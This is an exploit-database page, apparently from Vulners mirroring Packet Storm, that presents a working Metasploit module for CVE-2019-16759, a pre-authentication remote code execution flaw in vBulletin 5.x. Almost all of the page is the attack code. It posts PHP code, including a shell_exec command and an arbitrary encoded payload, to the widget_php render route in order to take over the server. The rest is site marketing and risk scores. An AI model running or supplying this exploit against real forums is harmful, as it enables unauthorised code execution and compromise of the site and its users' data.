Lucene search
K

vBulletin 5.x Pre-Auth Remote Code Execution

🗓️ 28 Sep 2019 00:00:00Reported by r00tpgpType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 577 Views

vBulletin 5.x 0day pre-auth RCE exploit for versions 5.0.0 to 5.5.

Related
Code
`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::HttpClient  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'vBulletin 5.x 0day pre-quth RCE exploit',  
'Description' => %q{  
vBulletin 5.x 0day pre-auth RCE exploit.  
This should work on all versions from 5.0.0 till 5.5.4  
},  
'Platform' => 'php',  
'License' => MSF_LICENSE,  
'Author' => [  
'Reported by: anonymous', # reported by  
'Original exploit by: anonymous', # original exploit  
'Metasploit mod by: r00tpgp', # metasploit module  
],  
'Payload' =>  
{  
'BadChars' => "\x22",  
},  
'References' =>  
[  
['CVE', 'CVE-2019-16759'],  
['EDB', 'NA'],  
['URL', 'https://seclists.org/fulldisclosure/2019/Sep/31'],  
['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16759']  
],  
'Arch' => ARCH_PHP,  
'Targets' => [  
[ 'Automatic Targeting', { 'auto' => true } ],  
# ['vBulletin 5.0.X', {'chain' => 'vB_Database'}],  
# ['vBulletin 5.1.X', {'chain' => 'vB_Database_MySQLi'}],  
],  
'DisclosureDate' => 'Sep 23 2019',  
'DefaultTarget' => 0))  
  
register_options(  
[  
OptString.new('TARGETURI', [ true, "The base path to the web application", "/"])  
])  
  
end  
  
def check  
res = send_request_cgi({  
'method' => 'POST',  
'uri' => normalize_uri(target_uri.path,'/index.php?routestring=ajax/render/widget_php'),  
'encode_params' => false,  
'vars_post' =>   
{  
'widgetConfig[code]' => "echo shell_exec(\'echo h4x0000r4l1f4 > /tmp/msf.check.out; cat /tmp/msf.check.out\');exit;",  
}  
})  
  
if res && res.body && res.body.include?('h4x0000r4l1f4')  
return Exploit::CheckCode::Vulnerable  
end  
  
Exploit::CheckCode::Safe  
end  
  
def exploit  
print_status("Sending payload.....")  
resp = send_request_cgi({  
'method' => 'POST',  
'uri' => normalize_uri(target_uri.path,'/index.php?routestring=ajax/render/widget_php'),  
'encode_params' => false,  
'vars_post' =>  
{  
#'widgetConfig[code]' => "echo " + payload.encoded + "exit;",  
'widgetConfig[code]' => payload.encoded,  
}  
})  
#unless resp and resp.code == 200  
# fail_with(Failure::Unknown, "Exploit failed.")  
#end  
  
#print_good("Success!")  
#print_line(resp.body)  
  
end  
end  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

28 Sep 2019 00:00Current
0.1Low risk
Vulners AI Score0.1
EPSS0.99728
577